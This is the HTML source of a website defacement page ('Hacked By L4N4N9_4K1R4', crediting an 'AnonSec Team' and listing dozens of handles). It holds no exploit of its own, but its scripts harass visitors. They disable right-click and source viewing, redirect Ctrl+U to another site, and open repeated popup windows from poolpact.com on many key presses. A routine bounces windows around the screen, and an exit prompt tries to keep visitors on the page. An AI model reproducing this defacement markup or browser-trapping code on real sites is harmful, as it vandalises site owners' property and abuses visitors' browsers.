<html>
<title> Hacked By L4N4N9_4K1R4 </title>
<head>
<meta property="og:image" content="https://i.imgur.com/6RSyvoJ.jpg">
<style type="text/css">* {cursor: url(https://cur.cursors-4u.net/symbols/sym-1/sym57.cur), auto !important;}</style><a href="https://www.cursors-4u.com/cursor/2005/06/03/sym57.html" target="_blank" title="Rock On"><img src="https://cur.cursors-4u.net/cursor.png" border="0" alt="Rock On" style="position:absolute; top: 0px; right: 0px;" /></a>
<audio autoplay>
<source src="https://a.top4top.io/m_20110tdb01.mp3">
</audio>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script data-ad-client="ca-pub-9507454540149215" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
let pesen="Heker Kok klik kanan, heker tuh CTRL+A >_<!";
function clickIE4(){if (event.button==2){alert(pesen);return false;}}
function clickNS4(e){if (document.layers||document.getElementById&&!document.all){if (e.which==2||e.which==3){alert(pesen);return false;}}}
if (document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS4;}
else if (document.all&&!document.getElementById){document.onmousedown=clickIE4;}
document.oncontextmenu=new Function("alert(pesen);return false")
</script
</head>
<center>
<body>
<embed src="https://www.youtube.com/v/j0TUZdBmr6Q&autoplay=1" type="application/x-shockwave-flash"wmode="transparent" width="1" height="1"></embed>
<body onmousedown ='return false'>
<script type='text/javascript'>
//<![CDATA[
shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="https://www.shafou.com/"});
//]]>
</script>
<script>


        var xOff = 5;
        var yOff = 5;
        var xPos = 400;
        var yPos = -100;
        var flagRun = 1;

function openWindow(url){
        aWindow = window.open(url,"_blank", 'menubar=no,status=no,toolbar=noresizable=no,width=180,height=175,titlebar=no,alwaysRaised=yes');
}

function procreate(){
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        }

function newXlt(){
        xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
        window.focus()}

function newXrt(){
        xOff = Math.ceil(7 * Math.random())  * 5 - 10 ;
        }

function newYup(){
        yOff = Math.ceil( 0 - 6 * Math.random())  * 5 - 10 ;
        }

function newYdn(){
        yOff = Math.ceil( 7 * Math.random())  * 5 - 10  ;
        }
function fOff(){
        flagrun = 0;
        }

function playBall(){
        xPos += xOff;
        yPos += yOff;
        if (xPos > screen.width-175){
        newXlt();
        }
        if (xPos < 0){
        newXrt();
        }
        if (yPos > screen.height-100){
        newYup();
        }
        if (yPos < 0){
        newYdn();
        }
        if (flagRun == 1){
        window.moveTo(xPos,yPos);
        setTimeout('playBall()',1);
        }
        }
document.onkeydown = function(e) {
        if (e.ctrlKey && 
            (e.keyCode === 67 || 
             e.keyCode === 86 ||
             e.keyCode === 74 ||
             e.keyCode === 68 ||
             e.keyCode === 85 || 
             e.keyCode === 87 || 
             e.keyCode === 72 || 
             e.keyCode === 117)) {
            openWindow('http://poolpact.com/documents/pop.html');
            openWindow('http://poolpact.com/documents/pop.html');
            openWindow('http://poolpact.com/documents/pop.html');
            openWindow('http://poolpact.com/documents/pop.html');
            openWindow('http://poolpact.com/documents/pop.html');
            openWindow('http://poolpact.com/documents/pop.html');
            openWindow('http://poolpact.com/documents/pop.html');
            openWindow('http://poolpact.com/documents/pop.html');
            openWindow('http://poolpact.com/documents/pop.html');
            openWindow('http://poolpact.com/documents/pop.html');
            openWindow('http://poolpact.com/documents/pop.html');
            openWindow('http://poolpact.com/documents/pop.html');
            return false;
        } else {
            return true;
        }
};        

document.onkeydown = keydown;

function keydown(evt) {
    if (!evt) evt = event;
    if (evt.altKey) {
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
    }
} // function keydown(evt)

document.onkeydown = keydown;

function keydown(e) {
    if (!e) e = event;
    if (e.ctrlKey) {
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
    }
} // function keydown(evt)

        </script>
        <script language="JavaScript">
    window.onbeforeunload = confirmExit;
    function confirmExit() {
        return "are you sure ? wkwk";
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
        openWindow('http://poolpact.com/documents/pop.html');
    }
</script>

<style>

body {

color:black;

font-family: Times New Roman !important;

}

 

a {

color:black;

  text-decoration: none;

  cursor:pointer;

}

a:hover { color:white;}

 

 

.type-wrap{

        margin:10px auto;

        padding:20px;

        }

 

        .grp {

                color: red;

                font-size: 40px;

                text-shadow: 0px 0px 8px white,0px 0px 8px white;

                }

#rotate {

          -webkit-animation: rotatePositive 5s infinite linear;

          -moz-animation: rotatePositive 5s infinite linear;

          -ms-animation: rotatePositive 5s infinite linear;

          -o-animation: rotatePositive 5s infinite linear;

          animation: rotatePositive 5s infinite linear;

                }

 

  @-webkit-keyframes rotatePositive {

      0% { -webkit-transform: rotatey(0deg); }

      100% { -webkit-transform: rotatey(360deg); }

  }

 

  @-moz-keyframes rotatePositive {

      0% { -moz-transform: rotatey(0deg); }

      100% { -moz-transform: rotatey(360deg); }

  }

 

  @-ms-keyframes rotatePositive {

      0% { -ms-transform: rotatey(0deg); }

      100% { -ms-transform: rotatey(360deg); }

  }

 

  @-o-keyframes rotatePositive {

      0% { -o-transform: rotatey(0deg); }

      100% { -o-transform: rotatey(360deg); }

  }

 

  @keyframes rotatePositive {

      0% { transform: rotatey(0deg); }

      100% { transform: rotatey(360deg); }

  }

        #blink {text-decoration:blink;

-webkit-animation-name: blink;

-webkit-animation-iteration-count: infinite;

-webkit-animation-timing-function: cubic-bezier(1.0,0,0,1.0);

-webkit-animation-duration: 1s;

}

.typed-cursor{

            opacity: 1;

            font-weight: 100;

            -webkit-animation: blink 0.7s infinite;

            -moz-animation: blink 0.7s infinite;

            -ms-animation: blink 0.7s infinite;

            -o-animation: blink 0.7s infinite;

            animation: blink 0.7s infinite;

        }

        @-keyframes blink{

            0% { opacity:1; }

            50% { opacity:0; }

            100% { opacity:1; }

        }

        @-webkit-keyframes blink{

            0% { opacity:1; }

            50% { opacity:0; }

            100% { opacity:1; }

        }

        @-moz-keyframes blink{

            0% { opacity:1; }

            50% { opacity:0; }

            100% { opacity:1; }

        }

        @-ms-keyframes blink{

            0% { opacity:1; }

            50% { opacity:0; }

            100% { opacity:1; }

        }

        @-o-keyframes blink{

            0% { opacity:1; }

            50% { opacity:0; }

            100% { opacity:1; }

        }

#plate{

  position: absolute;!important;

    top:0!important;

   

    left:0!important;

 width:100%;

 height:100%;

    overflow:hidden!important;

    z-index:-1!important;

    margin:0;

    padding:0;

    position:fixed;

    opacity:0.6;

}

 

.hackBody{

  min-height:550px;

}

 

.container

{

margin-top:10px;

}

    </style>
<onmousedown ='return false;'>
<body bgcolor="black">  
<font face="Staatliches" color="red" size="11">HACKED BY L4N4N9_4K1R4</font><br>
<font face="Staatliches" color="WHITE" size="6">-=[AnonSec Team]=-</font><br></a>
<div id="rotate"><img src="http://poolpact.com/documents/AnonSec.jpg" width="300px"></div><br>
<font face="Staatliches" size="4" color="white">[#RIP JUSTICE IN MY COUNTRY]</font><br>
<font face="Staatliches" color="gray" size="2">GreetZ: AnonSec Team</font><br>
<font face="Staatliches" color="gray" size="2"> Anon7 - L4N4N9_4K1R4 - /Rayzky_ - ./meicookies - exa_gans77 - VenoRyan - MR.HAGAN_4040CR4ZY - PohonSagu - ./s3nt1n3L - DemonArmy - FarisGanss - KosameAmegai - CompuByte - B3bek_Gans - Mr.Froggy - K4TSUY4-GH05T - Malaikat Hati - He4l3rz - PsychoH4xor - Mr.Grim - Rian Haxor - ChokkaXploiter - Algisec1337 - Jamet1337 - MungielL - Nzxsx7 - ./G1L4N6_ST86 - kuroaMEpiKAcyu - X-5L0W - UnknownSec - Nolep4tx - Temp3 - B4dServ3r - Mr.L3gacy</font><br>
<font face="CordiaUPC" color="red" size="3">From Set Set Set To Your Security. How?..Yo Ndak Tau Kok Tanya Saya. Yo Tanya Bapak Jangan Tanya Saya.</font><br>
<font color="black" size="3"> papahkuheker@protonmail.com </font><br>
</body>
</center>
</html>

